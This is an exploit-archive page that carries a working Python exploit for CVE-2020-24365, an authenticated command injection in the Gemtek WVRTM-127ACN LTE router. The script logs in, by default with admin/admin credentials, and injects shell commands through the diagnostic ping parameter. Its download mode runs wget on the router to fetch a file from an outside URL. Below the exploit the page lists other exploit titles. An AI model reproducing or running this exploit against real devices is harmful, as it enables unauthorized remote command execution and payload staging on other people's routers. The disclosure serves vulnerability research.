Menu

Search for hundreds of thousands of exploits

"Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection"

Author

Exploit author

"Gabriele Zuddas"

Platform

Exploit platform

cgi

Release date

Exploit published date

2020-11-19

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection 
# Date: 13/09/2020                                         
# Exploit Author: Gabriele Zuddas                         
# Version: 01.01.02.127, 01.01.02.141                      
# CVE : CVE-2020-24365                                     


Service Provider : 	Linkem
Product Name : 	LTE CPE
Model ID : 	WVRTM-127ACN
Serial ID :	GMK170418011089
IMEI : 	XXXXXXXXXXXXX
ICCID : 	XXXXXXXXXXXXXXXXXX
Firmware Version : 	01.01.02.141
Firmware Creation Date : 	May 15 13:04:30 CST 2019
Bootrom Version : 	U-Boot 1.1.3
Bootrom Creation Date : 	Oct 23 2015 - 16:03:05
LTE Support Band : 	42,43


Injecting happens here:

sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&


Exploit has been tested on older verions too:
    Firmware Version: 	01.01.02.127
    Firmware Creation Date : 	May 23 15:34:10 CST 2018

"""

import requests, time, argparse, re, sys

class Exploit():
    
    CVE = "CVE-2020-24365"
    
    def __init__(self, args):
        self.args = args
        self.session = requests.Session()
    
    def login(self):
        s = self.session
        r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
        if "sid" not in s.cookies:
            print("[!] Login failed.")
            exit(1)
        sid = s.cookies["sid"]
        s.headers = {"sid": sid}
        print(f"[*] Login successful! (sid={sid})")
    
    def now(self):
        return int(time.time() * 1000)

    def exploit(self, command):
        self.login()
        
        with self.session as s:
            payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"
            
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")

            #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")
            
            #TODO: eventually parse content with regex to clean out the output
            c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
            print(content)
            print(c[0])
            
            if len(c) > 0:
                return c[0]
            else:
                return False

    def download_file(self, url):
        filename = url.rsplit('/', 1)[-1]
        
        if self.args.file is not None:
            print(f"[*] Attempting download of file '{filename}' from {url} ...")
    
            if self.exploit(f"wget {url} -O /tmp/{filename}"):
                print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")
                print(self.exploit(f"du -h /tmp/{filename}"))
                return True
            else:
                print(f"[!] Failed to download {filename} from {url}")
                return False

    def run(self):
        if self.args.command is not None:
            print(self.exploit(self.args.command))
            exit()
        if self.args.file is not None:
            self.download_file(self.args.file)
            exit()

if __name__ == "__main__":
    # Create the parser and add arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
    
    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")

    args = parser.parse_args()

    # Run exploit
    X = Exploit(args)
    if len(sys.argv) > 1:
        print(f"[*] Exploiting {X.CVE} ...")
        X.run()
    else:
        parser.print_help(sys.stderr)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas"
2020-10-29 "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" webapps cgi "Valerio Alessandroni"
2020-04-23 "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" webapps cgi "Dhiraj Mishra"
2020-04-10 "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" webapps cgi "Basim Alabdullah"
2020-03-30 "Zen Load Balancer 3.10.1 - Remote Code Execution" webapps cgi "Cody Sixteen"
2020-02-11 "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" webapps cgi Luca.Chiou
2019-09-09 "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" webapps cgi LiquidWorm
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
Release Date Title Type Platform Author
2020-11-19 "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" webapps cgi "Gabriele Zuddas" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected